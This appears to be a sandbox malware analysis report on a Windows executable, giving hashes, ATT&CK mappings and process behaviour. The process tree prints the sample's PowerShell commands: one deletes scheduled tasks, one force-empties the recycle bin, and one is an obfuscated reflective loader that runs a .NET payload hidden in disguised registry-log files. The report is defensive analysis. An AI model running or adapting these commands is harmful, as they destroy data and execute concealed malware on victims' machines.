5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645

General

Target

5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe
Size

4.8MB
MD5

8126c4e7101ca615321e9a73ff179100
SHA1

809cbf787f1fdffe4b26459d34c4b541a26ccf4d
SHA256

5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645
SHA512

077d780e8fb751cecd1054834fd6f8999abdc5a0058f8169a34a68fe9d47b7f1cdd1630f5a44d88aff1fd8d0c90777babc353d8fd888b3893f174522768cf121
SSDEEP

49152:yqj00f62wSvIu8kyyOiIBQoKHnHuB1UAjwqbMVaydWfOHSCyN78/NW6g/yjKj63e:yieSvLy0IKoKHHIMz15bN84s

Score

6^/10

defense_evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2648	powershell.exe
2940	powershell.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	powershell.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
3308	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2648	powershell.exe
2648	powershell.exe
3308	powershell.exe
3308	powershell.exe
2940	powershell.exe
2940	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeIncreaseQuotaPrivilege	2648	powershell.exe
Token: SeSecurityPrivilege	2648	powershell.exe
Token: SeTakeOwnershipPrivilege	2648	powershell.exe
Token: SeLoadDriverPrivilege	2648	powershell.exe
Token: SeSystemProfilePrivilege	2648	powershell.exe
Token: SeSystemtimePrivilege	2648	powershell.exe
Token: SeProfSingleProcessPrivilege	2648	powershell.exe
Token: SeIncBasePriorityPrivilege	2648	powershell.exe
Token: SeCreatePagefilePrivilege	2648	powershell.exe
Token: SeBackupPrivilege	2648	powershell.exe
Token: SeRestorePrivilege	2648	powershell.exe
Token: SeShutdownPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeSystemEnvironmentPrivilege	2648	powershell.exe
Token: SeRemoteShutdownPrivilege	2648	powershell.exe
Token: SeUndockPrivilege	2648	powershell.exe
Token: SeManageVolumePrivilege	2648	powershell.exe
Token: 33	2648	powershell.exe
Token: 34	2648	powershell.exe
Token: 35	2648	powershell.exe
Token: 36	2648	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4508 wrote to memory of 2648	4508	5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe	83
PID 4508 wrote to memory of 2648	4508	5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe	83
PID 4508 wrote to memory of 3308	4508	5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe	85
PID 4508 wrote to memory of 3308	4508	5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe	85
PID 4508 wrote to memory of 2940	4508	5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe	90
PID 4508 wrote to memory of 2940	4508	5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe	90

C:\Users\Admin\AppData\Local\Temp\5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe
"C:\Users\Admin\AppData\Local\Temp\5d2632675a842d2ff367dd336a5ae3ea030af615ae614dc4e3a11bacc1923645N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -Command " $tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\Windows\*' -and $_.TaskName -ne 'VideoConvertor' } foreach ($task in $tasks) { try { Unregister-ScheduledTask -TaskName $task.TaskName -Confirm:$false } catch { continue } } "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -Command "Clear-RecycleBin -Force -ErrorAction SilentlyContinue"
  2⤵
  - Enumerates connected drives
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -Command " Function Init-VideoCache ([String] $CacheBuffer) { $CacheList = [System.Collections.Generic.List[Byte]]::new(); for ($i = 0; $i -lt $CacheBuffer.Length; $i += 8) { $CacheList.Add([Convert]::ToByte($CacheBuffer.Substring($i, 8), 2)) } return [System.Text.Encoding]::ASCII.GetString($CacheList.ToArray()) }; function Clear-VideoTempFiles { param([string] $tempPath) $tempFiles = $tempPath.Split(' ') $buffer = New-Object 'byte[]' ($tempFiles.Count / 2) $count = 0 for ($i = 0; $i -lt $tempFiles.Count - 1; $i += 2) { $buffer[$count] = [byte]($tempFiles[$i]) $count++ } return $buffer } $TempCache = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f1209-1254-13ef-ada4-080027dede23}.TxR.blf') $BootImage = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{4280000a-1254-11ef-ada2-080007dede23}.TM.blf') $BootParser = Init-VideoCache(Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-333333}.TM.blf') $SystemConfig = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f120a-1254-eeeef-ada2-080027dede23}.TM.blf') $CleanupTask = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-sdd2-080027dede23}.TM.blf') $Image = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-aad43-080027dede23}.TM.blf') $Module = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543454444a-13354-11ef-aad43-080027dede23}.TM.blf') $LookupModule = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543ss44a-13354-113f-aad43-08227dede23}.TM.blf') $ModuleParams = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-5227de33}.TM.blf') $SystemAssembly = [Reflection.Assembly] $SystemAssembly::$Module([Byte[]]$BootImage).$LookupModule($SystemConfig).$ModuleParams($CleanupTask).$Image($null,[Object[]]($BootParser,[Byte[]]$TempCache)) "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Ignore Process Interrupts

1

T1564.011

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97748f71ed95026706014e8524266292

SHA1
f60663ea2e2a778c57d07d9678fe04c79c3ff942

SHA256
f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f

SHA512
b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5kn3wv33.5kf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2648-1-0x0000024DE8FF0000-0x0000024DE9012000-memory.dmp

Filesize
136KB

Download
memory/2648-11-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/2648-12-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/2648-13-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/2648-16-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/2648-0-0x00007FF850B83000-0x00007FF850B85000-memory.dmp

Filesize
8KB

Download
memory/3308-18-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/3308-20-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/3308-32-0x0000024D6A110000-0x0000024D6A32C000-memory.dmp

Filesize
2.1MB

Download
memory/3308-33-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/3308-19-0x00007FF850B80000-0x00007FF851641000-memory.dmp

Filesize
10.8MB

Download
memory/4508-34-0x00007FF7DF360000-0x00007FF7DF7E6000-memory.dmp

Filesize
4.5MB

Download

Analysis

Sharing